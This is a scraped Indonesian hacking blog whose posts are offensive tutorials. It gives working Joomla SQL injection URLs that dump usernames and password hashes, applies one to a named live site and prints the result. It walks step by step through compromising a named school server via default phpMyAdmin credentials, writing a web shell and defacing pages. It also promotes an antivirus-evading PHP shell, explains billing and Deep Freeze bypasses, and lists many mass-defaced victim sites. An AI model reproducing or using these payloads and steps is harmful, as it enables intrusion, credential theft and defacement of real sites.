# Title: Joomla Component com_biographies SQL injection Vulnerability
# EDB-ID: 11226
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Snakespc
# Published: 2010-01-22
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
#--------------------------------------------------------
#Joomla (com_biographies) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_biographies"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--
Joomla Component com_biographies SQL injection Vulnerability
Diposting oleh agus windarto di 03.45 0 komentar
Label: cracking, d4rk_kn19ht, hacking, joomla, security, SQL, web
Hack Billing Warnet
cara hack billing di warnet, atow pengen ngenet gratis..
Untuk User : [CLIENT]
1. jika windows palsu..
kita tekan shift saat menyalakan kompi..
tunggu sampe dekstop kluar. ingat.. SHIFT HARUS DITEKAN SAMPE DEKSTOP KLUAR.
setelah itu refresh..
2. jika windows asli. kita download software PROCCESXP.exe
3. jika kita sudah login.. kita buka PROCCESXP.exenya dan kita cari yg namanya BILLING, langsung aja kita DELETE
BAGI OP WARNET : [SERVER]
1. jika gaji kita kurang. ato lagi kepepet..
dan ingin melihat password database, kita download software bi4.exe.
kita bisa mengunakan buat lihat password database dan kita bisa menghapus juga.
untuk software tanya ama mbah google..
Diposting oleh agus windarto di 22.46 0 komentar
Label: cracking, d4rk_kn19ht, hacking, intip, password, security, server
r58 Shell Undetect With Password
khusus ku buat untuk member yogyacarderlink, shell ini gabungan dari r57 dengan r58, saya gabungin sehingga memiliki password untuk login. bagus nya lagi, shell ini undetect jadi gak usah khawatir ama anti virus..
gambar page login untuk masuk ke shell:
setelah masuk shell:
download disini yah
d4rk_kn19ht private shell
Diposting oleh agus windarto di 19.54 0 komentar
Label: d4rk_kn19ht, hacking, hacking tool, phpshell, private, r57, r58, shell, yogyacarderlink
Intip Password Joomla
Sebagai CMS yang terkenal ternyata joomla memililihi banyak kelemahan-kelemahan, apalagi terhadap aplikasi (komponen) tambahan. yang mengakibatkan hacker dapat mengintip password dari admin joomla melalui SQLi
Parah lagi, askes Cpanel pun bisa tertembus karena halaman config yang tak terenkripsi. Dimanakah kita dapat mengintip password tersebut?. Letak pasword tersebut berada pada file "configuration.php". dari informasi bila kita perhatikan cermat, maka akan tertulis "$user" atau $password. Parah lagi, terhadap kesalahan admin yang sering sama dalam memakai password administrator dengan password Cpanel.
Utuk menangani hal tersebut bisa kita instal component "mambots". dengan begitu password akan terenkripsi dan sulit untuk di susupi hacker.
Namun masih banyak kekurngan joomla yang masih memungkinkan untuk di tembus
New Year In HackeD
Wew, sobat2 qw di Yogyacarderlink melakukan mass deface di thn baru ini
korban nya:
dari d4rk_kn19ht:
http://madiuncity.com/dk.htm
http://indobioenergy.com/dk.htm
http://lp3i-jambi.org/dk.htm
http://bajubutik.net/dk.htm
http://radict.com/dk.htm
http://graciatehnik.com/dk.htm
http://bakayarou.org/dk.htm
http://nationfirstschool.com/dk.htm
http://warungserpang.com/dk.htm
http://enjoysulawesi.com/dk.htm
http://ketutbudiana.com/dk.htm
http://indacoservices.com/dk.htm
http://pe-training.com/dk.htm
http://kimiadasar.com/dk.htm
http://pusat-belanja.net/dk.htm
http://www.princessbali.com/dk.htm
http://baype.com/dk.htm
http://www.seputarkesehatan.com/dk.htm
http://ssb-bintangmuda.com/dk.htm
http://untag-banyuwangi.ac.id/dk.htm
http://sman1lemahabangcirebon.sch.id/dk.htm
http://www.wongwaiwit-industrial.com
http://designkingdom.ug/dk.htm
http://giss.co.th/dk.htm
http://www.bailan-kohchang.com/dk.htm
http://www.ebcitrade.com/dk.htm
http://www.woodwork999.com/dk.htm
http://eisquare.com
http://publishing.eisquare.com
dari master v3n0m:
41comunicacao.com.br
academiapotencia.com.br
achaysacat.com.ar
acores.dk
advguilhermino.com.br
agathachristieaudio.com
anodo.net
antenistadelbarrio.es
apedido.cl
arquitectosdemexicali.net
audiofiestas.cl
autolog.com.mx
aviadoresdemalvinas.com.ar
ayerbeyguzman.com
bandasemiotica.com
bebeginincinsiyetinibelirle.com
beef-jerky-recipes.info
bemvivernutri.com.br
bermudez-abogados.com
biowater.com.mx
boatcanvasguy.com
brennum.dk
buytestosterones.com
c-saw.com
cabomedia.com.mx
cal-wireless.com
calentadoressolaresnayarit.com
carribeancruisezone.com
cascadehomeservices.com
cassiamelissa.com
celga.net
cellskinlab.cl
centrovidaac.com
chinacom-ltd.com
cic-odonto.com.ar
circuloindependiente.net
classicchevy.dk
clubmarena.com
commerceonline.com.ar
compulandvip.com
coronado-ca.us
corte-laser.com
costa-nord.com
craft-show-guide.com
crferrere.com
cristaleriaelfaraon.com
cxrex.com.mx
demandacalcados.com.br
diangeblitos.com
dietrinecarbblocker.net
directoriodempresas.com.ar
distritoxiii.es
diversionesinteractivas.com
djak.com.br
djbubaonline.net
dr-teguh.com
drababneh.com
durostlaw.com
e3insumos.com.ar
ebookmedia.com.br
edgewaterresortmi.com
elbro.dk
electricistadelbarrio.es
elmgoats.com
enjoydaytonabeach.com
es-contracting.ca
escalafau.com.ar
estudiogierberg.com.ar
etsum.edu.mx
eventointegral.com
excluzif.com
exitpolinesia.com.ar
explotiondanceshow.com.ar
fabroic.com.ar
federicoescandar.com.ar
find-furniture.us
fixitfinancing.com
flaviojudar.com.br
floreriaangeles.com
fofotostudios.com
fontanerodelbarrio.es
forexmarketsonline.net
fotibros.com
free-guys.com
fundacionbraun.com
fundacioncolombiainclusivaong.com
futureworks.dk
gac.com.br
galeriagrafica.com.gt
gama-ra.com.ar
gearbe.org
gizone.com.mx
grabado-laser.com
graniartmarmoraria.com.br
greentechsa.com
guitarheros3.com
hadasreposteriaamorosa.com
handymanhughes.com
harddiskinformatica.com.ar
hariworks.com.br
hempnowbook.com
himalayaladakh.com
horsebarnscustom.com
hosterialindau.com.ar
hoteldelvalledeguadalupe.com.mx
hotelesdeeuropa.com.ar
hotelmarlin.com.mx
howtogrowplumeria.com
howtorentahome.com
ieec.com.mx
ikrdata.dk
impresorasdepc.com.ar
ingridcastro.com.br
inlakeshdesign.com
isifbrigade.info
jaliscodigital.net
jimmytsguideservice.com
jpymxsiemprejuntos.com
judysvoice.com
kebrakadeira.com.br
kikyto.com
kiquedelagm.com
laborem.cl
latinlabels.com
leseteknikk.info
lindelmar.com
liuxuchen.com
loanlineup.com
lojadachinchila.com.br
lucifatuch.com
macaptechnology.com
magallantladd.com
mago-para-fiestas.com.ar
manoscurativas.com
marcelomedeiros.net
marcoshopff.com.ar
mariabelenlonghini.com.ar
mercerialaprincipal.com.mx
mmimportaciones.com.uy
mortgagelineup.com
motoclubevirtual.com.br
mrgwindowcleaners.com
mundopiercing.com
mycompany4you.info
myforextradingonline.net
nonrecoursemoney.com
ocioinformatico.com
ofertasde.com.ar
olphpack4.org
onsitestaffing.net
oscd.com.br
pacc.cl
pasiegos.es
peiltda.com
photomosaico.com.br
pipaforsale.com.br
pmainformatica.com.ar
poipushorescondo.com
pomparoma.cl
pranor.com
programasdepc.com.ar
projetotesourinha.org.br
ptsr.dk
publizip.com
pymesdecordoba.com
realestatesequimwa.com
refriclima.com.ar
reycaimpresores.com
rgsoriana.com
rhodesville.com
rinconcillos.com
rumourcontrol.dk
salustri.com.ar
samakcorretordeimoveis.com.br
sanfersrl.com
saohmett.com.mx
sayes.com.mx
scientificmoulding.com
scrapkreative.com.mx
scutum.com.br
segamex.com.mx
serviciourbano.cl
speedinternetservice.com
spinpalace.se
spo-dental.com.ar
stegstedgaard.dk
susanne-benny.dk
takuma.ru
talmid.com.br
tellurideartgallery.com
telluriderealtor.org
temeculaconvis.com
terrainvest.dk
ticketlineup.com
tiptopguatemala.com
torellomarcelo.com
torrealpina.com.mx
trucosymagia.com.ar
trucosytips.com
turismoruraltierradelobos.es
uep.edu.mx
unicentrodeoccidente.com.co
unidadeducativavidanueva.com
uniongreatescape.co.uk
valorhumano.com.ar
vercaza.com
vikretha.com
virgendelmartirio.org
vivelaargentina.com.ar
volunteeringinperu.com
vsrepresentacoes.com
wallymago.com.ar
welcometoftlauderdale.com
wipvoip.com.br
xephia.com
xiancompany.com
zenedaris.com
ziraonline.com
zirp.dk
nyt.zirp.dk
ny.zirp.dk
demo.zirp.dk
bn.zirp.dk
dari crackboy99
http://realestateclicks.in/
http://sreekesaritours.com/
http://rangolicostumes.com/
http://msstquilon.org/
http://middleeastrealtors.com/
http://keralatouristdesk.com/index.html
http://kripaholidays.com/
http://keralaandtourism.com/
http://www.jardines4jazz.com/
http://moonshealth.com/index.php
http://gobigbillboards.com/
klo yang di lakukan d4rk_kn19ht hanya hiden deface karena tidak mau merusak..
Diposting oleh agus windarto di 13.58 0 komentar
Label: deface, hacking, tahun baru, yogyacarderlink
HACK SERVER SEKOLAH
Tampilan web amikjtc beberapa bulan yang lalu
POC Hacking my school via phpmyadmin
dalam tutorial ini, saya akan mencoba hacking server sekolah ku.
dari hasil hack sekolah ku www.amikjtc.com beberapa bulan lalu, berhasil saya dapat beberapa informasi penting
yaitu username dan password phpmyadmin
usr : root <== default
pas : insanixxx <== sensored
informasi server sekolah ku :
OS WINDOWS NT 5.1
XAMPP 1.6.14 for windows (padahal sekarang udah 1.7.2)
http://server/ <== alamat server
http://server/AMIK <== aplikasi yang digunakan siswa dalam pengisian KRS
http://server/PERPUS <== aplikasi perpustakaan
Langsung melakukan penyerangan:
1. Ketik http://server/PHPMYADMIN <== masuk pada phpmyadmin
2. Permintaan username dan password isi dengan informasi data di atas
3. Ternyata, kesalahan yang klasik (penggunaan usr dan pas phpmyadmin di web dengan server sekolah)
4. cari informasi phpinfo, untuk mengetahui letak penginstalan server XAMPP (c:/xampp/xampp/htdocs/)
4. Klik pada icon SQL
5 Jalankan query SQL :
select "phpshell" into outfile 'letak_file'
phpshell : bisa menggunakan r57, c99 dst. dalam uji coba ini saya gunakan r57. dan shell harus di decrypt dulu..
letak_file : c:/xampp/xampp/htdocs/shell.php
contoh r57 yg telah di decrypt :
""
(maaf di putus karena terlalu panjang r57 nya)
Query secara penuh:
select "" into outfile 'c:/xampp/xampp/htdocs/shell.php'
6. run query
maka telah didapat shell.php (sebagai backdoor) di lokasi "http://server/shell.php"
7. pindah-pindah direktory kerja di maka akan didapatkan
C:/localdisc
D:/windows <== tempat instalasi windows
E:/localdisc
F:/localdisc
G:/localdisc
8. melakukan deface pada aplikasi KRS ONLINE:
pindah direktori kerja di ; C:/xampp/xampp/htdoc/AMIK/
edit index.php dan ganti isi script nya dengan script deface
maka akan berubah tampilan KRS ONLINE menjadi seperti gambar diatas
9. Melakukan deface di aplikasi perpus dengan cara yang sama..
Dengan begitu, SERVER AMIK resmi saya HACK
thx for: all yogyacarderlink crew, my frend di AMIKjtc, all indonesian hacker
hacked by d4rk_kn19ht
Diposting oleh agus windarto di 07.07 2 komentar
Jebol Password Deep Freeze 6
Sesuai dengan dinamika dan perkembangan jaman - banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk
Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.
Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5. Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh
TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.
Tampilannya seperti ini :
id="BLOGGER_PHOTO_ID_5389448487420654082" border="0">
Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .
Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password
TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.
Tampilannya seperti ini :
alt="" id="BLOGGER_PHOTO_ID_5389450097694633698" border="0">
Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.
Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.
Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.
Download tool nya disini
Sumber : Jasakom.com
Diposting oleh agus windarto di 17.01 0 komentar
Label: cracking, deep freeze 6, hacking
HACKING WEB AMIK
WWW.AMIKJTC.COM web yang bagus, rapi susunan nya. Tapi di balik itu, ada sebuah celah besar.
- www.amikjtc.com
- www.amikjtc.com/administrator/
- www.amikjtc.com/administrator/file_edithapus.php
pada file_edithapus.php ada 2 kesalahan:
1. tidak mempunyai index penutup.
maka akan ditampilkan file-file yang ada di dalam folder tsb.
sungguh kesalahan webmaster idiot..
2. tidak memiliki filter extensi file yang akan di upload,
parah lagi, tidak perlu sebagai admin bila ingin upload.
dari sana bisa di upload phpshell yag saya dapat dari indonesiancoder (sebelum saya masuk yogyacarderlink)
eksekusi phpshell dari
www.amikjtc.com/file/shell.php (menurut kode sumber halaman)
maka kita dapat akses shell..
dengan begitu, apa yang terjadi?
terjadilah defaceing (merubah tampilan halaman depan)
SQL Injection Joomla
############################################
## Joomla Component com_lyftenbloggie Remote SQL injection vulnerability – (author)
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : November 11, 2009 ##
############################################
[ Software Information ]
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5.
LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:”com_lyftenbloggie” / “Powered by LyftenBloggie”
[+] LOCATION : INDONESIA – JOGJA
############################################
EXPLOIT :
62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--
Wew, dapat dork dari pak dhe.. di indonesiancoder ne..
ok kita bahas dork SQL yang mengusung LyftenBloggie/blog publishing component
(plugin baru kale..)
klo belum tau SQL injection ga papa.. cz dork ini mudah di terapkan
sekarang kita cari target di gogle dengan dork inurl:”com_lyftenbloggie” / “Powered by LyftenBloggie”
Ambil satu contoh :
http://www.liveinlancasterpa.com/index.php?option=com_lyftenbloggie&author=62
Kita sisipkan exploitnya, jadi kayak gini:
http://www.liveinlancasterpa.com/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--
Wew, apa yang kita dapat?
yah kita dapat username dan password
Realty4921:9266997cc1dede121e043c5fb6e4ad53:lwgKy1TtkNiIpdWLJ6ZUKxJB9Me3pwsJ
username : Realty4921
Password : 9266997cc1dede121e043c5fb6e4ad53
Ok dech, tutor ini sekian dulu, untuk password, masih dalam bentuk md5. jadi harus di decrypt. tanya paman gogle aja dengan dork md5 decryptor
Sumber : Indonesiancoder
thanks to:
IndonesianCoder, Yogyacarderlink, Jasakom, Yogyafree, and All Indonesian underground.
TUTORIAL NMAP
Dalam melakukan hacking jarak jauh tahap awalnya adalah mengintip
yap memang tepat kata ini digunakan dalam artikel ini , mengintip sebuah port alias service yang dijalankan oleh target dan server , service yang dijalankan protokol TCP ( transmission control protokol ) .
Port apasih yang kita mau intip ? pertanyaan ini sering diutarakan teman-teman saya
ok kita mau melihat gambaran port yang paling umum :
25 SMTP server
80 Webserver
110 Pop3 Server
dll
Semakin penasaran dengan nmap? mari kita pelajari lebih jauh tentang nmap ini
Nmap dirancang untuk melakukan scanning dalam jaringan , melihat operasi yang sedang berjalan
berbagai teknik yang digunakan seperti UDP, TCP , Connect () TCP SYN ( half open ) ftp proxy (bounce attack), Reverse-ident, ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, dan Null scan. , nmap juga menyediakan fitur remote os ( ping sweep ) FIN , ACK Sweep . Xmas Tree SYN Sweep [ bingung dengan istilah ilmiah diatas siapkan kamus anda lalu search digoogle ]
sebagai tools awal saya menggunakan backtrack [ slackware ] dengan Flat 3G
misal target anda :
www.jasakom.com
bt ~ # nmap -v sS -O www.jasakom.com
Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-29 07:15 GMT
Failed to resolve given hostname/IP: sS. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges
Initiating Parallel DNS resolution of 1 host. at 07:15
Completed Parallel DNS resolution of 1 host. at 07:15, 0.91s elapsed
Initiating System CNAME DNS resolution of 1 host. at 07:15
Completed System CNAME DNS resolution of 1 host. at 07:15, 0.40s elapsed
Initiating SYN Stealth Scan at 07:15
Scanning web115.discountasp.net (216.177.77.9) [1697 ports]
Discovered open port 21/tcp on 216.177.77.9
Discovered open port 80/tcp on 216.177.77.9
Discovered open port 25/tcp on 216.177.77.9
Discovered open port 443/tcp on 216.177.77.9
Increasing send delay for 216.177.77.9 from 0 to 5 due to 11 out of 29 dropped probes since last increase.
SYN Stealth Scan Timing: About 9.93% done; ETC: 07:20 (0:04:32 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.81% done; ETC: 07:19 (0:03:37 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 21.71% done; ETC: 07:19 (0:03:14 remaining)
Stats: 0:01:31 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.08% done; ETC: 07:19 (0:02:46 remaining)
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.87% done; ETC: 07:19 (0:02:43 remaining)
Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.50% done; ETC: 07:19 (0:02:44 remaining)
Stats: 0:02:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 49.70% done; ETC: 07:19 (0:02:00 remaining)
Discovered open port 8080/tcp on 216.177.77.9
Discovered open port 1027/tcp on 216.177.77.9
Stats: 0:03:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 85.89% done; ETC: 07:19 (0:00:32 remaining)
Stats: 0:03:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.03% done; ETC: 07:19 (0:00:27 remaining)
Stats: 0:03:53 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.62% done; ETC: 07:19 (0:00:07 remaining)
Stats: 0:04:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.15% done; ETC: 07:19 (0:00:02 remaining)
Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 07:19 (0:00:00 remaining)
Stats: 0:04:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 07:19 (0:00:00 remaining)
Completed SYN Stealth Scan at 07:19, 242.96s elapsed (1697 total ports)
Initiating OS detection (try #1) against web115.discountasp.net (216.177.77.9)
Retrying OS detection (try #2) against web115.discountasp.net (216.177.77.9)
Initiating gen1 OS Detection against 216.177.77.9 at 269.212s
Stats: 0:04:29 elapsed; 0 hosts completed (1 up), 1 undergoing OS Scan
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Stats: 0:05:08 elapsed; 0 hosts completed (1 up), 1 undergoing OS Scan
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host web115.discountasp.net (216.177.77.9) appears to be up ... good.
Interesting ports on web115.discountasp.net (216.177.77.9):
Not shown: 1684 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
554/tcp filtered rtsp
1027/tcp open IIS
8000/tcp filtered http-alt
8080/tcp open http-proxy
Device type: general purpose|web proxy|broadband router|firewall|WAP
Running (JUST GUESSING) : Microsoft Windows NT/2K/XP|2003/.NET (88%), Blue Coat SGOS (87%), Netopia embedded (86%), ZyXel ZyNOS (86%), Linux 1.X (85%), D-Link embedded (85%)
Aggressive OS guesses: Microsoft Windows XP Home Edition (German) SP2 (88%), Microsoft Windows 2003 Server or XP SP2 (88%), Microsoft Windows XP Pro SP2 (88%), BlueCoat SG4 (87%), Microsoft Windows 2003 Server SP1 (86%), Netopia DSL Router (86%), ZyXel ZyWALL 1 firewall (86%), ZyXel Zywall 10W firewall (86%), Linux 1.3.20 (x86) (85%), D-Link DI-774 WAP (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 19 hops
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Busy server or unknown class
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 360.207 seconds
Raw packets sent: 2050 (94.832KB) | Rcvd: 1908 (89.312KB)
Ada banyak option yang mengatur cara kerja nmap, beberapa yang sering saya gunakan misalnya:
-P0 - tidak melakukan ping ke target, untuk menghindari kita terlihat oleh target.
-f - menggunakan potongan paket kecil-kecil (fragmented) agar sulit di deteksi oleh software
pendeteksi penyusup.
-v - verbose mode, untuk melihat hasil antara proses scan pada layar.
-O - mencoba menebak sistem operasi yang digunakan oleh mesin target.
masih penasaran tentang perintah nmap
bt ~ # man nmap
Itulah dasar pondasi dalam hacking , selanjutnya ada dapat berkreasi untuk mencoba menemukan bug
service tersebut , cari source di www.milw0rm.com dll tergantung kreasi anda selamat mencoba